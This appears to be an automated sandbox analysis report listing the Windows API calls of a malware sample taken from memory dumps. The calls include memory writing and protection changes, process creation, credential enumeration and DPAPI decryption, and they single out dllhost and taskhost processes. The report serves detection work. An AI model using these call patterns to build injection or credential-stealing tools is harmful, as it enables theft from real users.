                                • API String ID: 0-3899667951
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 022B7402: LoadLibraryA.KERNELBASE(EBE34479), ref: 022B75F0
                                • TerminateProcess.KERNELBASE(CAF71672,-70DBCC6D), ref: 022B5486
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: LibraryLoadProcessTerminate
                                • String ID: SBTI
                                • API String ID: 3349790660-1513441178
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: LibraryLoad
                                • String ID: &bX
                                • API String ID: 1029625771-1885336810
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • NtWriteVirtualMemory.NTDLL(?,0688E733,?,00000000,?,?,?,?,-C2E0AB5C), ref: 022B4FAB
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: MemoryVirtualWrite
                                • String ID:
                                • API String ID: 3527976591-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • EnumWindows.USER32(022B0626,?,00000000,2A2A731E,022B43D7,-9EB57EE9,55250968,B2079360,?,-26B1491D), ref: 022B05A4
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: EnumWindows
                                • String ID:
                                • API String ID: 1129996299-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • NtProtectVirtualMemory.NTDLL(-00000001815BAAEC,?,?,?,?,022B889B), ref: 022B9285
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: MemoryProtectVirtual
                                • String ID:
                                • API String ID: 2706961497-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 022B7402: LoadLibraryA.KERNELBASE(EBE34479), ref: 022B75F0
                                • NtAllocateVirtualMemory.NTDLL ref: 022B5AC2
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: AllocateLibraryLoadMemoryVirtual
                                • String ID:
                                • API String ID: 2616484454-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • NtProtectVirtualMemory.NTDLL(-00000001815BAAEC,?,?,?,?,022B889B), ref: 022B9285
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: MemoryProtectVirtual
                                • String ID:
                                • API String ID: 2706961497-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: AllocateLongMemoryNamePathVirtual
                                • String ID: ^M0
                                • API String ID: 4035640882-1678713791
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: AllocateMemoryVirtual
                                • String ID:
                                • API String ID: 2167126740-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: AllocateLibraryLoadMemoryVirtual
                                • String ID:
                                • API String ID: 2616484454-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CreateProcessInternalW.KERNELBASE ref: 022B9A0E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: CreateInternalProcess
                                • String ID: <$\
                                • API String ID: 2186235152-4038975477
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.335499477.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.335486041.0000000000400000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.335513902.0000000000415000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.335518943.0000000000417000.00000002.00020000.sdmp
                                Similarity
                                • API ID: #100
                                • String ID: VB5!6&*
                                • API String ID: 1341478452-3593831657
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: InitializeThunk
                                • String ID: N^~I
                                • API String ID: 2994545307-2182176484
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • LoadLibraryA.KERNELBASE(EBE34479), ref: 022B75F0
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: LibraryLoad
                                • String ID:
                                • API String ID: 1029625771-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RegSetValueExA.KERNELBASE(?,0000005B,-000000019C2138EA,1291EF98,?,?,022B6F45,?,?), ref: 022B23BB
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: Value
                                • String ID:
                                • API String ID: 3702945584-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • TerminateProcess.KERNELBASE(CAF71672,-70DBCC6D), ref: 022B5486
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: ProcessTerminate
                                • String ID:
                                • API String ID: 560597551-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • LoadLibraryA.KERNELBASE(EBE34479), ref: 022B75F0
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: LibraryLoad
                                • String ID:
                                • API String ID: 1029625771-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CreateFileA.KERNELBASE(?,-6D7F335A), ref: 022B5769
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: CreateFile
                                • String ID:
                                • API String ID: 823142352-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 022B5971: NtAllocateVirtualMemory.NTDLL ref: 022B5AC2
                                • RegSetValueExA.KERNELBASE(?,0000005B,-000000019C2138EA,1291EF98,?,?,022B6F45,?,?), ref: 022B23BB
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: AllocateMemoryValueVirtual
                                • String ID:
                                • API String ID: 115516962-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetLongPathNameW.KERNELBASE(?,?), ref: 022B719E
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: LongNamePath
                                • String ID:
                                • API String ID: 82841172-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • TerminateProcess.KERNELBASE(CAF71672,-70DBCC6D), ref: 022B5486
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: ProcessTerminate
                                • String ID:
                                • API String ID: 560597551-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetLongPathNameW.KERNELBASE(?,?), ref: 022B719E
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: LongNamePath
                                • String ID:
                                • API String ID: 82841172-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: LibraryLoad
                                • String ID: 8fd$gL="
                                • API String ID: 1029625771-859432238
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: r*4$~nh
                                • API String ID: 0-3726668126
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Qp a
                                • API String ID: 0-2838866663
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Qp a
                                • API String ID: 0-2838866663
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: lue
                                • API String ID: 0-2265836759
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 8fd
                                • API String ID: 0-256658910
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Qp a
                                • API String ID: 0-2838866663
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Da
                                • API String ID: 0-3380597304
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: DPy
                                • API String ID: 0-2132550623
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: h%U
                                • API String ID: 0-603279075
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: AllocateMemoryVirtual
                                • String ID:
                                • API String ID: 2167126740-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Executed Functions

                                APIs
                                • Sleep.KERNELBASE(?), ref: 00569E04
                                • NtProtectVirtualMemory.NTDLL(000000FF,-0000101B,-00000017), ref: 00569E42
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1285743420.0000000000569000.00000040.00000001.sdmp, Offset: 00569000, based on PE: false
                                Similarity
                                • API ID: MemoryProtectSleepVirtual
                                • String ID:
                                • API String ID: 3235210055-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 00569D6F
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1285743420.0000000000569000.00000040.00000001.sdmp, Offset: 00569000, based on PE: false
                                Similarity
                                • API ID: MemoryProtectVirtual
                                • String ID:
                                • API String ID: 2706961497-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 00569D6F
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1285743420.0000000000569000.00000040.00000001.sdmp, Offset: 00569000, based on PE: false
                                Similarity
                                • API ID: MemoryProtectVirtual
                                • String ID:
                                • API String ID: 2706961497-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • TerminateThread.KERNELBASE ref: 00569C5D
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1285743420.0000000000569000.00000040.00000001.sdmp, Offset: 00569000, based on PE: false
                                Similarity
                                • API ID: TerminateThread
                                • String ID:
                                • API String ID: 1852365436-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • TerminateThread.KERNELBASE ref: 00569C5D
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1285743420.0000000000569000.00000040.00000001.sdmp, Offset: 00569000, based on PE: false
                                Similarity
                                • API ID: TerminateThread
                                • String ID:
                                • API String ID: 1852365436-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • Sleep.KERNELBASE(?), ref: 00569E04
                                • NtProtectVirtualMemory.NTDLL(000000FF,-0000101B,-00000017), ref: 00569E42
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1285743420.0000000000569000.00000040.00000001.sdmp, Offset: 00569000, based on PE: false
                                Similarity
                                • API ID: MemoryProtectSleepVirtual
                                • String ID:
                                • API String ID: 3235210055-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions

                                Executed Functions

                                APIs
                                • memset.MSVCRT ref: 0040DDAD
                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                  • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                • FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                • _wcsicmp.MSVCRT ref: 0040DEB2
                                • _wcsicmp.MSVCRT ref: 0040DEC5
                                • _wcsicmp.MSVCRT ref: 0040DED8
                                • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                • memset.MSVCRT ref: 0040DF5F
                                • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                • _wcsicmp.MSVCRT ref: 0040DFB2
                                • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
                                • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                • API String ID: 594330280-3398334509
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                • memset.MSVCRT ref: 00413D7F
                                • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                • memset.MSVCRT ref: 00413E07
                                • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: Handle$??3@CloseProcess32memset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                • String ID: QueryFullProcessImageNameW$kernel32.dll
                                • API String ID: 912665193-1740548384
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetModuleHandleW.KERNEL32(00000000,?, AE,?,?,00411B78,?,General,?,00000000,00000001), ref: 0040B5A5
                                • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                • memcpy.MSVCRT ref: 0040B60D
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                • String ID: AE$BIN
                                • API String ID: 1668488027-3931574542
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                  • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                  • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                                • String ID:
                                • API String ID: 2947809556-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
                                • String ID:
                                • API String ID: 767404330-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: FileFind$FirstNext
                                • String ID:
                                • API String ID: 1690352074-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memset.MSVCRT ref: 0041898C
                                • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: InfoSystemmemset
                                • String ID:
                                • API String ID: 3558857096-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memset.MSVCRT ref: 004455C2
                                • wcsrchr.MSVCRT ref: 004455DA
                                • memset.MSVCRT ref: 0044570D
                                • memset.MSVCRT ref: 00445725
                                  • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                  • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                  • Part of subcall function 0040BDB0: CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                  • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                  • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                                  • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                  • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                                  • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                • memset.MSVCRT ref: 0044573D
                                • memset.MSVCRT ref: 00445755
                                • memset.MSVCRT ref: 004458CB
                                • memset.MSVCRT ref: 004458E3
                                • memset.MSVCRT ref: 0044596E
                                • memset.MSVCRT ref: 00445A10
                                • memset.MSVCRT ref: 00445A28
                                • memset.MSVCRT ref: 00445AC6
                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                  • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                  • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                  • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                  • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                  • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                • memset.MSVCRT ref: 00445B52
                                • memset.MSVCRT ref: 00445B6A
                                • memset.MSVCRT ref: 00445C9B
                                • memset.MSVCRT ref: 00445CB3
                                • _wcsicmp.MSVCRT ref: 00445D56
                                • memset.MSVCRT ref: 00445B82
                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                  • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                • memset.MSVCRT ref: 00445986
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
